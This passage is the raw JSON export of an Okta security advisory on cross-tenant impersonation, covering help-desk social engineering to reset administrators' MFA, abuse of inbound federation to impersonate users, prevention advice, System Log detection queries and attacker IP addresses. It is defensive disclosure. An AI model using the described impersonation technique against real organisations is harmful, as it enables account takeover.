Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:20:36.830Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2023/08/cross-tenant-impersonation-prevention-and-detection","id":"6bc1c645-891e-573d-8e8c-a6b05794d8ba","title":"Cross-Tenant Impersonation: Prevention and 
Detection","date":"2023-08-31T18:31:36+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has observed attacks in which a threat actor used social engineering to attain a highly privileged role in an Okta customer Organization (tenant).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When successful, the threat actor demonstrated novel methods of lateral movement and defense evasion.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These methods are preventable and present several detection opportunities for defenders.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent weeks, multiple US-based Okta customers have reported a consistent pattern of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/07/social-engineering-getting-more-extreme-fixes-can-be-simple\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"social engineering\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" attacks against their IT service desk personnel, in which the caller’s strategy was to convince service desk personnel to reset all Multi-factor Authentication (MFA) factors enrolled by highly privileged 
users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The attackers then \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/07/unexpected-endorsement-webauthn\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"leveraged their compromise\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of highly privileged Okta Super Administrator accounts to abuse legitimate identity federation features that enabled them to impersonate users within the compromised organization.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactics, Techniques and Procedures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security has identified a cluster of activity in which:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Threat actors appeared to either have a) passwords to privileged user accounts or b) be able to manipulate the delegated authentication flow via Active Directory (AD) prior to calling the IT service desk at a targeted org, requesting a reset of all MFA factors in the target account. 
In the case of Okta customers, the threat actor targeted users assigned with Super Administrator permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor would access the compromised account using anonymizing proxy services and an IP and device not previously associated with the user account.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The compromised Super Administrator accounts were used to assign higher privileges to other accounts, and/or reset enrolled authenticators in existing administrator accounts. In some cases, the threat actor removed second factor requirements from authentication policies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was observed configuring a second Identity Provider to act as an \\\"impersonation app\\\" to access applications within the compromised Org on behalf of other users. This second Identity Provider, also controlled by the attacker, would act as a “source” IdP in an inbound federation relationship (sometimes called “Org2Org”) with the target.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From this “source” IdP, the threat actor manipulated the username parameter for targeted users in the second “source” Identity Provider to match a real user in the compromised “target” Identity Provider. 
This provided the ability to Single sign-on (SSO) into applications in the target IdP as the targeted user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is Inbound Federation?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/concepts/identity-providers/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inbound Federation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allows access to applications in a target Identity Provider (IdP) if the user has successfully authenticated to a source IdP. The feature can also be used for Just-in-time (JIT) provisioning of users. It’s a feature that is used to save months off mergers, acquisitions and divestitures. It is also popular with large organizations (such as global parent companies) that require central controls or globally provision one set of applications (while also empowering divisions to have some level of autonomy for their own policies and apps).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given how powerful this is, access to create or modify an Identity Provider is limited to users with the highest permissions in an Okta organization - Super Administrator or Org Administrator. 
It can also be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/custom-admin-role/about-role-permissions.htm#IdP_permissions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"delegated to a Custom Admin Role\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to reduce the number of Super Administrators required in large, complex environments.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These recent attacks highlight why protecting access to highly privileged accounts is so essential.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevention\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on our analysis of this intrusion, we recommend Okta customers implement our industry-leading, phishing-resistant methods for enrollment, authentication and recovery; restrict the use of highly privileged accounts, and apply dedicated access policies for administrative users and monitor and investigate anomalous use of functions reserved for privileged users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A more detailed set of recommendations is listed below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect sign-in flows by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/07/unexpected-endorsement-webauthn\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"enforcing phishing-resistant 
authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with Okta FastPass and FIDO2 WebAuthn.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Settings > Features\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\") to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure Authentication Policies (Application Sign-on Policies) for access to privileged applications, including the Admin Console, to require re-authentication “at every sign-in”.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If using self-service recovery, initiate recovery with the strongest available authenticator, and limit recovery flows to trusted networks (by IP, ASN or geolocation).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Review and consolidate the use of Remote Management and Monitoring (RMM) tools by help desk personnel, and block execution of all other RMM 
tools.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Strengthen help desk identity verification processes using visual verification.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Turn on and test New Device and Suspicious Activity \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"end-user notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Take a \\\"Zero Standing Privileges\\\" approach to administrative access. 
Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/custom-admin-role/about-creating-custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/09/go-secure-default-custom-admin-roles-it-support-staff\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constrain custom help desk roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with resource sets that exclude groups of highly privileged administrators.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce dedicated admin policies - Assign all administrators to groups. Require users in these groups to sign-in from managed devices and via phishing resistant MFA (Okta FastPass, FIDO2 WebAuthn). 
Restrict this access to trusted Network Zones and deny access from anonymizing proxies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply ASN and IP Session Binding (from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Settings > Features\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\") to all administrative apps to prevent the replay of stolen administrative sessions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection and Response\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following System Log events and Workflows templates can be adapted to detect several of the TTPs listed above.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage of Attack\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Templates/Further Advice\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detect AiTM phishing using 
FastPass\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/blob/master/workflows/monitor_unsuccessful_phishing_attempts/readme.md\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor Unsuccessful Phishing Attempts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Denied Access due to ASN/IP Session Binding\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.session.detect_client_roaming\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/how-to-test-the-bind-admin-sessions-to-asn-feature?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Support 
article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on Factor Resets\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.mfa.factor.reset_all\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/blob/master/workflows/trigger_notifications_when_all_mfa_factors_are_res/readme.md\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trigger Notifications when All MFA Factors are Reset\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on Factor Downgrades\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There is no System Log event for a Factor downgrade. 
To monitor all activation and deactivation events, use the following query:\\n\\neventType sw\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\\"system.mfa.factor\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/blob/master/workflows/tracking_and_alerting_for_possible_account_takeove/readme.md\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tracking and Alerting for Possible Account Takeover Events\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on User Suspicious Activity Reports\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.account.report_suspicious_activity_by_enduser\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity 
Reported\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on New Behaviors during Access to Okta Admin Console\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.displayName eq \\\"Okta Admin Console\\\" and debugContext.debugData.behaviors co \\\"POSITIVE\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"and\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.displayName eq \\\"Okta Admin Console\\\" and debugContext.debugData.LogOnlySecurityData co \\\"POSITIVE\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend administrators use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/behavior-detection/about-behavior-policy-rule.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expression Language\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to alert on access to the Admin Console from users that meet the following conditions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.behaviors.contains('New IP') && security.behaviors.contains('New 
Device')\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on Sign-In Attempts via Anonymizing Proxies\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.session.start\\\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"and \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"securityContext.isProxy eq \\\"true\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend administrators deny sign-ins from these services in policy using a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/network/create-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Network Zone\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on Creation of an Identity Provider by a Super Administrator or Org Administrator\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"system.idp.lifecycle.create\\\"\\n\\n\\n\\t\\t\\tAlternative that includes all creation and modification 
events:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"system.idp.lifecycle\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend delegating access to this feature to a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/custom-admin-role/about-creating-custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Role\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the minimum required permissions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alert on Sign-In Events via a Third-Party Identity Provider\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_IDP\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend alerting on these events if the organization does not currently use the Inbound Federation feature.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Indicators of Compromise\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For the period 2023-07-29 to 
2023-08-19\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP addresses:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"24.189.245.79\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"74.105.157.5\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"174.199.192.95\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"98.113.77.43\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"108.21.89.22\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"75.252.4.33\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"tabl
